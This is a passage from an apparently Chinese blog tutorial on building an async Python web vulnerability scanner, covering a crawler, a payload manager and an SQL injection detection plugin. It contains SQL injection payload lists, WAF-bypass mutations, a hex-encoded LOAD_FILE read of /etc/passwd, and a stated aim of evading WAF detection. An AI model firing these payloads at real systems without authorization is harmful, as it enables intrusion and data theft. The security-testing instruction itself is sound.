首页 / 文章 / 安全开发

自建Web漏洞扫描器:架构设计与核心引擎实现

前言:为什么要自建扫描器

市面上的商业扫描器(AWVS、AppScan、Nessus)功能强大但闭源昂贵,开源工具(Nikto、Wapiti、ZAP)灵活但不够定制化。在实际红蓝对抗和安全服务中,自建扫描器有三个不可替代的价值:

  1. 定制化Payload:针对特定CMS/中间件编写专用检测逻辑
  2. 可控并发模型:避免商业扫描器的高并发特征被WAF识别
  3. 结果可编程:漏洞数据直接入库,与自有平台联动

本文将从零开始,设计并实现一个模块化、可扩展的Web漏洞扫描器,覆盖爬虫引擎、Payload管理、并发调度、POC插件系统和报告输出等核心模块。

一、扫描器总体架构

1.1 架构设计

┌─────────────────────────────────────────────┐
│                  CLI / API                    │
├─────────────────────────────────────────────┤
│              Scheduler (调度器)               │
│    ┌─────────────────────────────┐           │
│    │     Task Queue (任务队列)     │           │
│    └─────────────┬───────────────┘           │
├──────────────────┼───────────────────────────┤
│    ┌─────────────┴───────────────┐           │
│    │   Crawler Engine (爬虫)      │           │
│    │  - URL发现                  │           │
│    │  - 表单提取                 │           │
│    │  - 参数识别                 │           │
│    └─────────────┬───────────────┘           │
├──────────────────┼───────────────────────────┤
│    ┌─────────────┴───────────────┐           │
│    │   Scanner Core (扫描核心)    │           │
│    │  - Payload Manager          │           │
│    │  - Plugin Engine            │           │
│    │  - Fingerprint Engine       │           │
│    └─────────────┬───────────────┘           │
├──────────────────┼───────────────────────────┤
│    ┌─────────────┴───────────────┐           │
│    │   Concurrency (并发控制)     │           │
│    │  - asyncio Event Loop       │           │
│    │  - Rate Limiter             │           │
│    │  - Proxy Pool               │           │
│    └─────────────┬───────────────┘           │
├──────────────────┼───────────────────────────┤
│    ┌─────────────┴───────────────┐           │
│    │   Result Engine (结果引擎)   │           │
│    │  - Report Generator         │           │
│    │  - Database Writer          │           │
│    │  - Webhook Notifier         │           │
│    └─────────────────────────────┘           │
└─────────────────────────────────────────────┘

1.2 项目结构

web_scanner/
├── scanner/
│   ├── __init__.py
│   ├── core/
│   │   ├── engine.py          # 扫描核心引擎
│   │   ├── scheduler.py       # 任务调度器
│   │   └── config.py          # 配置管理
│   ├── crawler/
│   │   ├── spider.py          # 爬虫主逻辑
│   │   ├── form_extractor.py  # 表单提取器
│   │   └── url_normalizer.py  # URL标准化
│   ├── plugins/
│   │   ├── base.py            # 插件基类
│   │   ├── sqli.py            # SQL注入检测
│   │   ├── xss.py             # XSS检测
│   │   ├── lfi.py             # 文件包含检测
│   │   ├── ssrf.py            # SSRF检测
│   │   └── command_injection.py
│   ├── payloads/
│   │   ├── manager.py         # Payload管理器
│   │   ├── sqli_payloads.yaml
│   │   ├── xss_payloads.yaml
│   │   └── lfi_payloads.yaml
│   ├── concurrency/
│   │   ├── pool.py            # 连接池/并发控制
│   │   └── ratelimiter.py     # 速率限制器
│   ├── fingerprint/
│   │   └── wappalyzer.py      # 指纹识别
│   └── report/
│       ├── generator.py       # 报告生成
│       └── templates/         # 报告模板
├── tests/
├── config.yaml
└── requirements.txt

二、爬虫引擎实现

2.1 异步爬虫核心

"""scanner/crawler/spider.py - 异步爬虫引擎"""
import asyncio
import aiohttp
import logging
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
from dataclasses import dataclass, field
from typing import Set, List, Optional
import re

logger = logging.getLogger(__name__)

@dataclass
class CrawlResult:
    """爬取结果"""
    url: str
    status_code: int
    headers: dict
    body: str
    forms: List[dict] = field(default_factory=list)
    links: List[str] = field(default_factory=list)
    javascript_urls: List[str] = field(default_factory=list)
    comments: List[str] = field(default_factory=list)

class AsyncSpider:
    """异步Web爬虫"""
    
    def __init__(self, base_url: str, max_depth: int = 3, 
                 max_pages: int = 500, concurrency: int = 10):
        self.base_url = base_url
        self.base_domain = urlparse(base_url).netloc
        self.max_depth = max_depth
        self.max_pages = max_pages
        self.concurrency = concurrency
        
        self.visited: Set[str] = set()
        self.url_queue: asyncio.Queue = asyncio.Queue()
        self.results: List[CrawlResult] = []
        self.semaphore = asyncio.Semaphore(concurrency)
        
        # URL黑名单(静态资源等)
        self.blacklist_extensions = {
            '.css', '.js', '.png', '.jpg', '.jpeg', '.gif', '.svg',
            '.ico', '.woff', '.woff2', '.ttf', '.eot', '.mp4', '.mp3',
            '.pdf', '.doc', '.docx', '.xls', '.xlsx', '.zip', '.tar', '.gz'
        }
        
        # 自定义请求头
        self.headers = {
            "User-Agent": "Mozilla/5.0 (compatible; SecurityScanner/1.0)",
            "Accept": "text/html,application/xhtml+xml,*/*",
            "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8",
        }
    
    def should_crawl(self, url: str) -> bool:
        """判断URL是否应该被爬取"""
        parsed = urlparse(url)
        
        # 同域检查
        if parsed.netloc and parsed.netloc != self.base_domain:
            return False
        
        # 扩展名检查
        ext = parsed.path.split('.')[-1].lower() if '.' in parsed.path else ''
        if f'.{ext}' in self.blacklist_extensions:
            return False
        
        # 去重
        normalized = self._normalize_url(url)
        if normalized in self.visited:
            return False
        
        return True
    
    def _normalize_url(self, url: str) -> str:
        """URL标准化(去掉fragment,统一 trailing slash 等)"""
        parsed = urlparse(url)
        normalized = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
        if parsed.query:
            # 按字母排序query参数
            params = sorted(parsed.query.split('&'))
            normalized += '?' + '&'.join(params)
        return normalized
    
    def extract_forms(self, soup: BeautifulSoup, url: str) -> List[dict]:
        """提取页面中的表单"""
        forms = []
        for form_tag in soup.find_all('form'):
            form = {
                'action': urljoin(url, form_tag.get('action', '')),
                'method': form_tag.get('method', 'GET').upper(),
                'inputs': [],
                'selects': [],
                'textareas': []
            }
            
            # 提取 input
            for input_tag in form_tag.find_all('input'):
                input_info = {
                    'name': input_tag.get('name', ''),
                    'type': input_tag.get('type', 'text'),
                    'value': input_tag.get('value', ''),
                    'placeholder': input_tag.get('placeholder', '')
                }
                form['inputs'].append(input_info)
            
            # 提取 select
            for select in form_tag.find_all('select'):
                options = [opt.get('value', '') for opt in select.find_all('option')]
                form['selects'].append({
                    'name': select.get('name', ''),
                    'options': options
                })
            
            # 提取 textarea
            for textarea in form_tag.find_all('textarea'):
                form['textareas'].append({
                    'name': textarea.get('name', ''),
                    'value': textarea.text
                })
            
            if form['action']:
                forms.append(form)
        
        return forms
    
    def extract_links(self, soup: BeautifulSoup, url: str) -> List[str]:
        """提取页面中的链接"""
        links = []
        for a_tag in soup.find_all('a', href=True):
            href = urljoin(url, a_tag['href'])
            parsed = urlparse(href)
            # 只保留http/https
            if parsed.scheme in ('http', 'https'):
                links.append(href)
        return links
    
    def extract_comments(self, html: str) -> List[str]:
        """提取HTML注释(可能包含敏感信息)"""
        comments = re.findall(r'<!--(.*?)-->', html, re.DOTALL)
        return [c.strip() for c in comments if len(c.strip()) > 3]
    
    def extract_javascript(self, soup: BeautifulSoup, url: str) -> List[str]:
        """提取JS文件URL"""
        scripts = []
        for script in soup.find_all('script', src=True):
            src = urljoin(url, script['src'])
            scripts.append(src)
        return scripts
    
    async def fetch(self, session: aiohttp.ClientSession, 
                    url: str, depth: int) -> Optional[CrawlResult]:
        """异步获取页面"""
        try:
            async with session.get(
                url, 
                headers=self.headers, 
                timeout=aiohttp.ClientTimeout(total=15),
                allow_redirects=True,
                max_redirects=5
            ) as response:
                if 'text/html' not in response.headers.get('Content-Type', ''):
                    return None
                
                body = await response.text()
                soup = BeautifulSoup(body, 'html.parser')
                
                result = CrawlResult(
                    url=url,
                    status_code=response.status,
                    headers=dict(response.headers),
                    body=body,
                    forms=self.extract_forms(soup, url),
                    links=self.extract_links(soup, url),
                    javascript_urls=self.extract_javascript(soup, url),
                    comments=self.extract_comments(body)
                )
                
                # 将新发现的链接加入队列
                for link in result.links:
                    if self.should_crawl(link):
                        await self.url_queue.put((link, depth + 1))
                
                return result
                
        except asyncio.TimeoutError:
            logger.warning(f"Timeout: {url}")
        except aiohttp.ClientError as e:
            logger.warning(f"Request error for {url}: {e}")
        except Exception as e:
            logger.error(f"Unexpected error for {url}: {e}")
        
        return None
    
    async def worker(self, session: aiohttp.ClientSession):
        """工作协程"""
        while len(self.visited) < self.max_pages:
            try:
                url, depth = await asyncio.wait_for(
                    self.url_queue.get(), timeout=5
                )
            except asyncio.TimeoutError:
                break
            
            normalized = self._normalize_url(url)
            if normalized in self.visited or depth > self.max_depth:
                self.url_queue.task_done()
                continue
            
            self.visited.add(normalized)
            
            async with self.semaphore:
                result = await self.fetch(session, url, depth)
                if result:
                    self.results.append(result)
                    logger.info(
                        f"[Crawled] depth={depth} "
                        f"forms={len(result.forms)} "
                        f"links={len(result.links)} "
                        f"-> {url}"
                    )
            
            self.url_queue.task_done()
    
    async def crawl(self) -> List[CrawlResult]:
        """主爬取流程"""
        # 初始化队列
        await self.url_queue.put((self.base_url, 0))
        
        connector = aiohttp.TCPConnector(
            limit=self.concurrency * 2,
            limit_per_host=self.concurrency,
            force_close=True
        )
        
        async with aiohttp.ClientSession(connector=connector) as session:
            workers = [
                asyncio.create_task(self.worker(session))
                for _ in range(self.concurrency)
            ]
            
            # 等待队列清空或达到最大页数
            while len(self.visited) < self.max_pages:
                await asyncio.sleep(0.5)
                if self.url_queue.empty():
                    # 再等待一会确保没有新链接加入
                    await asyncio.sleep(3)
                    if self.url_queue.empty():
                        break
            
            # 取消剩余worker
            for w in workers:
                w.cancel()
            
            await asyncio.gather(*workers, return_exceptions=True)
        
        logger.info(f"Crawl finished. Visited {len(self.visited)} pages, "
                     f"collected {len(self.results)} results.")
        return self.results

# 使用示例
async def main():
    spider = AsyncSpider(
        base_url="http://testphp.vulnweb.com",
        max_depth=3,
        max_pages=100,
        concurrency=10
    )
    results = await spider.crawl()
    
    # 统计
    total_forms = sum(len(r.forms) for r in results)
    total_links = sum(len(r.links) for r in results)
    print(f"\n=== Crawl Statistics ===")
    print(f"Pages crawled: {len(results)}")
    print(f"Forms found: {total_forms}")
    print(f"Links found: {total_links}")
    print(f"Comments found: {sum(len(r.comments) for r in results)}")

if __name__ == "__main__":
    asyncio.run(main())

三、Payload管理系统

3.1 YAML格式Payload库

# scanner/payloads/sqli_payloads.yaml
sql_injection:
  # 基础探测
  detection:
    - payload: "'"
      expected: ["error", "syntax", "mysql", "SQL", "ODBC", "Warning"]
      type: error_based
      description: "单引号报错探测"
    
    - payload: "\""
      expected: ["error", "syntax", "psql", "unterminated"]
      type: error_based
      description: "双引号报错探测"
    
    - payload: "' AND '1'='1"
      expected: ["normal"]
      type: boolean_based
      description: "布尔真值测试"
    
    - payload: "' AND '1'='2"
      expected: ["different"]
      type: boolean_based
      description: "布尔假值测试"
    
    - payload: "'; WAITFOR DELAY '0:0:5'--"
      type: time_based
      threshold_ms: 4000
      description: "MSSQL时间盲注"

  # Union注入
  union:
    - payload: "' UNION SELECT NULL--"
      description: "Union列数探测1"
    
    - payload: "' UNION SELECT NULL,NULL--"
      description: "Union列数探测2"
    
    - payload: "' UNION SELECT NULL,NULL,NULL,NULL,NULL--"
      description: "Union列数探测5"
    
    - payload: "' UNION SELECT @@version,NULL--"
      dbms: mysql
      description: "MySQL版本获取"

  # 数据库指纹
  fingerprint:
    - payload: "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- "
      dbms: mysql
      description: "MySQL SLEEP指纹"
    
    - payload: "'; SELECT pg_sleep(5)--"
      dbms: postgresql
      description: "PostgreSQL SLEEP指纹"
    
    - payload: "'; WAITFOR DELAY '0:0:5'--"
      dbms: mssql
      description: "MSSQL WAITFOR指纹"
    
    - payload: "' AND 1234=DBMS_PIPE.RECEIVE_MESSAGE('RDS',5)--"
      dbms: oracle
      description: "Oracle DBMS_PIPE指纹"

  # 绕过WAF
  bypass:
    - payload: "/**/OR/**/1=1"
      type: comment_bypass
      description: "注释绕过空格过滤"
    
    - payload: "SeLeCt * FrOm users"
      type: case_bypass
      description: "大小写绕过"
    
    - payload: "1' AND IF(1=1,(SELECT+LOAD_FILE(0x2f6574632f706173737764)),0)#"
      type: hex_bypass
      description: "十六进制编码绕过"

3.2 Payload管理器实现

"""scanner/payloads/manager.py"""
import yaml
import random
from pathlib import Path
from typing import List, Dict, Any, Optional
from dataclasses import dataclass

@dataclass
class Payload:
    """单个Payload"""
    content: str
    type: str
    description: str
    dbms: Optional[str] = None
    expected: Optional[List[str]] = None
    threshold_ms: Optional[int] = None
    metadata: Dict[str, Any] = None

class PayloadManager:
    """Payload管理器 - 负责加载、选择、管理Payload"""
    
    def __init__(self, payload_dir: str = "payloads/"):
        self.payload_dir = Path(payload_dir)
        self.payloads: Dict[str, List[Payload]] = {}
        self._load_all()
    
    def _load_all(self):
        """加载所有YAML payload文件"""
        if not self.payload_dir.exists():
            return
        
        for yaml_file in self.payload_dir.glob("*.yaml"):
            try:
                with open(yaml_file, 'r', encoding='utf-8') as f:
                    data = yaml.safe_load(f)
                
                category = yaml_file.stem.replace('_payloads', '')
                self.payloads[category] = []
                
                for vuln_type, payloads in (data.get(category, {}) or {}).items():
                    if isinstance(payloads, list):
                        # 直接列表
                        for p in payloads:
                            self._add_payload(category, vuln_type, p)
                    elif isinstance(payloads, dict):
                        # 子分类
                        for sub_type, sub_payloads in payloads.items():
                            if isinstance(sub_payloads, list):
                                for p in sub_payloads:
                                    self._add_payload(category, sub_type, p)
                                    
            except Exception as e:
                print(f"Error loading {yaml_file}: {e}")
    
    def _add_payload(self, category: str, vuln_type: str, data: dict):
        """将YAML数据转为Payload对象"""
        payload = Payload(
            content=data.get('payload', ''),
            type=data.get('type', vuln_type),
            description=data.get('description', ''),
            dbms=data.get('dbms'),
            expected=data.get('expected'),
            threshold_ms=data.get('threshold_ms'),
            metadata=data
        )
        self.payloads.setdefault(category, []).append(payload)
    
    def get_by_category(self, category: str) -> List[Payload]:
        """按类别获取payload"""
        return self.payloads.get(category, [])
    
    def get_by_type(self, category: str, payload_type: str) -> List[Payload]:
        """按类型获取payload"""
        return [p for p in self.get_by_category(category) 
                if p.type == payload_type]
    
    def get_by_dbms(self, category: str, dbms: str) -> List[Payload]:
        """按数据库类型获取payload"""
        return [p for p in self.get_by_category(category) 
                if p.dbms and p.dbms.lower() == dbms.lower()]
    
    def get_random(self, category: str, count: int = 5) -> List[Payload]:
        """随机选取payload(用于模糊测试)"""
        available = self.get_by_category(category)
        return random.sample(available, min(count, len(available)))
    
    def generate_mutation(self, payload: Payload, 
                         mutations: List[str] = None) -> List[Payload]:
        """对payload进行变异(绕过WAF)"""
        if mutations is None:
            mutations = ["case", "comment", "urlencode", "double_urlencode", "hex"]
        
        mutated = []
        content = payload.content
        
        mutation_map = {
            "case": lambda s: ''.join(
                c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(s)
            ),
            "comment": lambda s: s.replace(' ', '/**/'),
            "double_quote": lambda s: s.replace("'", '"'),
            "tabs": lambda s: s.replace(' ', '\t'),
        }
        
        for mutation_name in mutations:
            if mutation_name in mutation_map:
                new_content = mutation_map[mutation_name](content)
                new_payload = Payload(
                    content=new_content,
                    type=payload.type,
                    description=f"{payload.description} [{mutation_name} bypass]",
                    dbms=payload.dbms,
                    expected=payload.expected,
                    threshold_ms=payload.threshold_ms,
                    metadata={"mutation": mutation_name, "original": content}
                )
                mutated.append(new_payload)
        
        return mutated
    
    def summary(self) -> str:
        """输出Payload库摘要"""
        lines = ["=== Payload Library Summary ==="]
        total = 0
        for category, payloads in self.payloads.items():
            types = set(p.type for p in payloads)
            lines.append(f"  [{category}] {len(payloads)} payloads, types: {types}")
            total += len(payloads)
        lines.append(f"  Total: {total} payloads")
        return '\n'.join(lines)


# 使用示例
if __name__ == "__main__":
    pm = PayloadManager("payloads/")
    print(pm.summary())
    
    # 获取SQLi检测payload
    sqli_payloads = pm.get_by_type("sql_injection", "error_based")
    print(f"\n[*] Error-based SQLi payloads: {len(sqli_payloads)}")
    for p in sqli_payloads[:5]:
        print(f"    {p.content} - {p.description}")
    
    # 变异payload
    original = sqli_payloads[0]
    mutated = pm.generate_mutation(original)
    print(f"\n[*] Mutated payloads:")
    for p in mutated:
        print(f"    {p.content} - {p.description}")

四、插件系统设计

4.1 插件基类

"""scanner/plugins/base.py - 插件基类"""
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from typing import List, Dict, Any, Optional
from enum import Enum
import time

class Severity(Enum):
    INFO = "info"
    LOW = "low"
    MEDIUM = "medium"
    HIGH = "high"
    CRITICAL = "critical"

@dataclass
class Vulnerability:
    """漏洞信息"""
    name: str
    description: str
    severity: Severity
    url: str
    parameter: str
    payload: str
    evidence: str
    cvss_score: Optional[float] = None
    cwe_id: Optional[str] = None
    remediation: Optional[str] = None
    raw_request: Optional[str] = None
    raw_response: Optional[str] = None
    timestamp: float = field(default_factory=time.time)

@dataclass
class ScanTarget:
    """扫描目标"""
    url: str
    method: str = "GET"
    params: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)
    body: Optional[str] = None
    content_type: str = "application/x-www-form-urlencoded"

class BasePlugin(ABC):
    """扫描插件基类"""
    
    # 插件元信息
    name: str = "base"
    description: str = "Base plugin"
    version: str = "1.0.0"
    author: str = "security-team"
    
    # 风险等级
    severity: Severity = Severity.MEDIUM
    
    # 是否启用
    enabled: bool = True
    
    def __init__(self, config: Dict[str, Any] = None):
        self.config = config or {}
        self.findings: List[Vulnerability] = []
        self._init_config()
    
    def _init_config(self):
        """初始化插件配置"""
        self.enabled = self.config.get('enabled', True)
        self.timeout = self.config.get('timeout', 10)
        self.retries = self.config.get('retries', 2)
    
    @abstractmethod
    async def scan(self, target: ScanTarget, session) -> List[Vulnerability]:
        """扫描方法 - 子类必须实现"""
        pass
    
    def add_finding(self, vuln: Vulnerability):
        """添加漏洞发现"""
        self.findings.append(vuln)
    
    def clear_findings(self):
        """清空发现"""
        self.findings.clear()
    
    def get_info(self) -> Dict[str, Any]:
        """获取插件信息"""
        return {
            "name": self.name,
            "description": self.description,
            "version": self.version,
            "severity": self.severity.value,
            "enabled": self.enabled
        }

4.2 SQL注入检测插件

"""scanner/plugins/sqli.py - SQL注入检测插件"""
import asyncio
import aiohttp
import re
import time
from typing import List
from .base import BasePlugin, ScanTarget, Vulnerability, Severity

class SQLiPlugin(BasePlugin):
    """SQL注入检测插件"""
    
    name = "sql_injection"
    description = "Detect SQL Injection vulnerabilities"
    version = "2.0.0"
    severity = Severity.CRITICAL
    
    # 错误特征
    ERROR_PATTERNS = [
        (re.compile(r"SQL syntax.*MySQL", re.I), "MySQL"),
        (re.compile(r"Warning.*mysql_", re.I), "MySQL"),
        (re.compile(r"PostgreSQL.*ERROR", re.I), "PostgreSQL"),
        (re.compile(r"Driver.*SQL[\-\s]*Server", re.I), "MSSQL"),
        (re.compile(r"Oracle.*Driver", re.I), "Oracle"),
        (re.compile(r"SQLite.*Error", re.I), "SQLite"),
        (re.compile(r"ODBC.*Driver", re.I), "ODBC"),
        (re.compile(r"SQLSTATE\[\d+\]", re.I), "PDO"),
        (re.compile(r"Unclosed quotation mark", re.I), "MSSQL"),
        (re.compile(r"quoted string not properly terminated", re.I), "Oracle"),
    ]
    
    def __init__(self, config=None):
        super().__init__(config)
        
        # 检测Payloads
        self.detection_payloads = [
            # 错误检测
            {"payload": "'", "type": "error"},
            {"payload": "\"", "type": "error"},
            {"payload": "'\"", "type": "error"},
            {"payload": "')", "type": "error"},
            
            # 布尔检测
            {"payload": "' AND '1'='1", "type": "boolean"},
            {"payload": "' AND '1'='2", "type": "boolean"},
            {"payload": "' OR '1'='1", "type": "boolean"},
            
            # 时间检测
            {"payload": "'; WAITFOR DELAY '0:0:5'--", "type": "time", "dbms": "MSSQL"},
            {"payload": "' OR SLEEP(5)#", "type": "time", "dbms": "MySQL"},
            {"payload": "' OR pg_sleep(5)--", "type": "time", "dbms": "PostgreSQL"},
            
            # 算术检测
            {"payload": "' AND 1=1--", "type": "boolean"},
            {"payload": "' AND 1=2--", "type": "boolean"},
            
            # Union探测
            {"payload": "' UNION SELECT NULL--", "type": "union"},
            {"payload": "') UNION SELECT NULL--", "type": "union"},
        ]
        
        self.time_threshold = 4.0  # 时间盲注阈值(秒)
    
    def detect_dbms(self, response_text: str) -> str:
        """通过响应识别数据库类型"""
        for pattern, dbms in self.ERROR_PATTERNS:
            if pattern.search(response_text):
                return dbms
        return "Unknown"
    
    async def send_payload(self, target: ScanTarget, payload: str, 
                          param_name: str, session) -> tuple:
        """发送带有payload的请求"""
        new_params = target.params.copy()
        new_params[param_name] = payload
        
        start_time = time.time()
        try:
            if target.method == "GET":
                async with session.get(
                    target.url,
                    params=new_params,
                    headers=target.headers,
                    cookies=target.cookies,
                    timeout=aiohttp.ClientTimeout(total=self.timeout)
                ) as resp:
                    response_text = await resp.text()
                    elapsed = time.time() - start_time
                    return resp.status, response_text, elapsed
            else:
                async with session.post(
                    target.url,
                    data=new_params,
                    headers=target.headers,
                    cookies=target.cookies,
                    timeout=aiohttp.ClientTimeout(total=self.timeout)
                ) as resp:
                    response_text = await resp.text()
                    elapsed = time.time() - start_time
                    return resp.status, response_text, elapsed
        except Exception as e:
            return 0, str(e), time.time() - start_time
    
    async def test_error_based(self, target: ScanTarget, param: str, 
                              session) -> List[Vulnerability]:
        """错误注入检测"""
        findings = []
        
        # 获取正常响应作为基准
        _, normal_response, _ = await self.send_payload(
            target, target.params.get(param, ''), param, session
        )
        normal_length = len(normal_response)
        
        error_payloads = [p for p in self.detection_payloads if p['type'] == 'error']
        
        for p in error_payloads:
            status, response, elapsed = await self.send_payload(
                target, p['payload'], param, session
            )
            
            dbms = self.detect_dbms(response)
            
            if dbms != "Unknown" or (status == 500 and len(response) != normal_length):
                findings.append(Vulnerability(
                    name="SQL Injection (Error-based)",
                    description=f"Error-based SQL injection detected in parameter '{param}'",
                    severity=Severity.CRITICAL,
                    url=target.url,
                    parameter=param,
                    payload=p['payload'],
                    evidence=f"DBMS identified: {dbms}\nStatus: {status}\n"
                            f"Response length: {len(response)} (normal: {normal_length})",
                    cvss_score=9.8,
                    cwe_id="CWE-89",
                    remediation="Use parameterized queries / prepared statements"
                ))
                break  # 找到一个即可
        
        return findings
    
    async def test_boolean_based(self, target: ScanTarget, param: str, 
                               session) -> List[Vulnerability]:
        """布尔盲注检测"""
        findings = []
        
        # 发送真值payload
        true_payloads = ["' AND '1'='1", "' OR '1'='1", "' AND 1=1--"]
        false_payloads = ["' AND '1'='2", "' AND 1=2--", "' OR '1'='2"]
        
        for true_p, false_p in zip(true_payloads, false_payloads):
            _, true_resp, _ = await self.send_payload(target, true_p, param, session)
            _, false_resp, _ = await self.send_payload(target, false_p, param, session)
            
            true_len = len(true_resp)
            false_len = len(false_resp)
            
            # 如果真值和假值响应长度差异超过20%,判定为布尔盲注
            if abs(true_len - false_len) / max(true_len, 1) > 0.2:
                findings.append(Vulnerability(
                    name="SQL Injection (Boolean-based Blind)",
                    description=f"Boolean-based blind SQL injection in parameter '{param}'",
                    severity=Severity.HIGH,
                    url=target.url,
                    parameter=param,
                    payload=f"TRUE: {true_p} | FALSE: {false_p}",
                    evidence=f"TRUE response: {true_len} bytes\n"
                            f"FALSE response: {false_len} bytes\n"
                            f"Difference: {abs(true_len - false_len)} bytes",
                    cvss_score=7.5,
                    cwe_id="CWE-89",
                    remediation="Use parameterized queries"
                ))
                break
        
        return findings
    
    async def test_time_based(self, target: ScanTarget, param: str,
                            session) -> List[Vulnerability]:
        """时间盲注检测"""
        findings = []
        
        # 先测试正常请求的响应时间
        _, _, baseline_time = await self.send_payload(
            target, target.params.get(param, ''), param, session
        )
        
        time_payloads = [p for p in self.detection_payloads if p['type'] == 'time']
        
        for p in time_payloads:
            _, _, elapsed = await self.send_payload(target, p['payload'], param, session)
            
            # 如果响应时间超过阈值(相对于基准时间)
            if elapsed > max(self.time_threshold, baseline_time * 3):
                findings.append(Vulnerability(
                    name="SQL Injection (Time-based Blind)",
                    description=f"Time-based blind SQL injection ({p.get('dbms', '')}) "
                               f"in parameter '{param}'",
                    severity=Severity.HIGH,
                    url=target.url,
                    parameter=param,
                    payload=p['payload'],
                    evidence=f"Response time: {elapsed:.2f}s "
                            f"(baseline: {baseline_time:.2f}s)",
                    cvss_score=7.5,
                    cwe_id="CWE-89",
                    remediation="Use parameterized queries"
                ))
                break
        
        return findings
    
    async def scan(self, target: ScanTarget, session) -> List[Vulnerability]:
        """执行SQL注入扫描"""
        self.clear_findings()
        
        if not target.params:
            return []
        
        # 并发检测所有参数
        tasks = []
        for param_name in target.params:
            tasks.append(self.test_error_based(target, param_name, session))
            tasks.append(self.test_boolean_based(target, param_name, session))
            tasks.append(self.test_time_based(target, param_name, session))
        
        results = await asyncio.gather(*tasks)
        
        for result_list in results:
            for finding in result_list:
                self.add_finding(finding)
        
        return self.findings

五、并发调度引擎

5.1 速率限制与连接池

"""scanner/concurrency/pool.py - 并发控制"""
import asyncio
import time
from typing import Dict, List
from dataclasses import dataclass, field

@dataclass
class HostStats:
    """主机请求统计"""
    request_count: int = 0
    last_request_time: float = 0.0
    error_count: int = 0
    consecutive_errors: int = 0

class RateLimiter:
    """速率限制器"""
    
    def __init__(self, requests_per_second: float = 10.0, 
                 burst: int = 20):
        self.rate = requests_per_second
        self.burst = burst
        self.tokens = float(burst)
        self.max_tokens = float(burst)
        self.last_update = time.monotonic()
        self.lock = asyncio.Lock()
    
    async def acquire(self) -> bool:
        """获取令牌"""
        async with self.lock:
            now = time.monotonic()
            elapsed = now - self.last_update
            
            # 令牌桶算法:按速率补充令牌
            self.tokens = min(self.max_tokens, 
                            self.tokens + elapsed * self.rate)
            self.last_update = now
            
            if self.tokens >= 1.0:
                self.tokens -= 1.0
                return True
            else:
                # 计算需要等待的时间
                wait_time = (1.0 - self.tokens) / self.rate
                return False  # 不等待,直接拒绝

class AdaptiveHostManager:
    """自适应主机管理器 — 根据目标响应调整请求速率"""
    
    def __init__(self, default_rate: float = 10.0, max_concurrent: int = 10):
        self.default_rate = default_rate
        self.max_concurrent = max_concurrent
        self.hosts: Dict[str, HostStats] = {}
        self.limiters: Dict[str, RateLimiter] = {}
        self.semaphores: Dict[str, asyncio.Semaphore] = {}
    
    def get_limiter(self, host: str) -> RateLimiter:
        """获取主机的速率限制器"""
        if host not in self.limiters:
            self.limiters[host] = RateLimiter(self.default_rate)
            self.semaphores[host] = asyncio.Semaphore(self.max_concurrent)
        return self.limiters[host]
    
    def get_semaphore(self, host: str) -> asyncio.Semaphore:
        """获取主机的并发信号量"""
        if host not in self.semaphores:
            self.semaphores[host] = asyncio.Semaphore(self.max_concurrent)
        return self.semaphores[host]
    
    def record_response(self, host: str, error: bool = False, 
                        response_time: float = 0.0):
        """记录响应以自适应调整"""
        if host not in self.hosts:
            self.hosts[host] = HostStats()
        
        stats = self.hosts[host]
        stats.request_count += 1
        
        if error:
            stats.error_count += 1
            stats.consecutive_errors += 1
            
            # 连续错误时降低速率
            limiter = self.get_limiter(host)
            limiter.rate = max(1.0, limiter.rate * 0.8)
        else:
            stats.consecutive_errors = 0
            
            # 正常响应时逐步恢复速率
            limiter = self.get_limiter(host)
            limiter.rate = min(self.default_rate, limiter.rate * 1.05)

class ConcurrentScanner:
    """并发扫描器"""
    
    def __init__(self, rate: float = 10.0, max_concurrent: int = 15,
                 host_manager: AdaptiveHostManager = None):
        self.host_manager = host_manager or AdaptiveHostManager(rate, max_concurrent)
        self.total_requests = 0
        self.total_errors = 0
    
    async def scan_with_control(self, coro, host: str):
        """在并发控制下执行扫描"""
        semaphore = self.host_manager.get_semaphore(host)
        
        async with semaphore:
            start = time.time()
            try:
                result = await coro
                elapsed = time.time() - start
                self.host_manager.record_response(host, error=False, 
                                                  response_time=elapsed)
                self.total_requests += 1
                return result
            except Exception as e:
                self.host_manager.record_response(host, error=True)
                self.total_errors += 1
                raise e
    
    async def scan_targets(self, targets: List, scan_func):
        """扫描多个目标"""
        tasks = []
        for target in targets:
            host = target.url.split('/')[2]  # 提取host部分
            task = self.scan_with_control(scan_func(target), host)
            tasks.append(task)
        
        results = await asyncio.gather(*tasks, return_exceptions=True)
        return results
    
    def stats(self) -> str:
        """输出统计信息"""
        return (
            f"Requests: {self.total_requests} | "
            f"Errors: {self.total_errors} | "
            f"Hosts: {len(self.host_manager.hosts)}"
        )


# 使用示例
async def scanner_main():
    from urllib.parse import urlparse
    
    scanner = ConcurrentScanner(rate=5.0, max_concurrent=10)
    
    async def scan_single(url):
        # 模拟扫描
        await asyncio.sleep(1)
        return {"url": url, "status": "clean"}
    
    targets = [f"http://example{i}.com" for i in range(50)]
    
    # 并发执行但有速率控制
    results = await scanner.scan_targets(targets, scan_single)
    print(scanner.stats())

if __name__ == "__main__":
    asyncio.run(scanner_main())

六、报告生成

"""scanner/report/generator.py"""
import json
import html
from datetime import datetime
from typing import List
from pathlib import Path
from scanner.plugins.base import Vulnerability

class ReportGenerator:
    """扫描报告生成器"""
    
    HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <title>Web漏洞扫描报告</title>
    <style>
        body { font-family: -apple-system, sans-serif; margin: 40px; color: #333; }
        h1 { color: #1a1a1a; border-bottom: 3px solid #e74c3c; padding-bottom: 10px; }
        h2 { color: #2c3e50; margin-top: 30px; }
        .summary { display: flex; gap: 20px; margin: 20px 0; }
        .stat { padding: 15px 25px; border-radius: 8px; color: white; font-size: 24px; 
                font-weight: bold; }
        .stat.critical { background: #e74c3c; }
        .stat.high { background: #e67e22; }
        .stat.medium { background: #f39c12; }
        .stat.low { background: #3498db; }
        .stat.info { background: #95a5a6; }
        .finding { border: 1px solid #ddd; border-radius: 6px; padding: 15px; 
                   margin: 15px 0; border-left: 4px solid #e74c3c; }
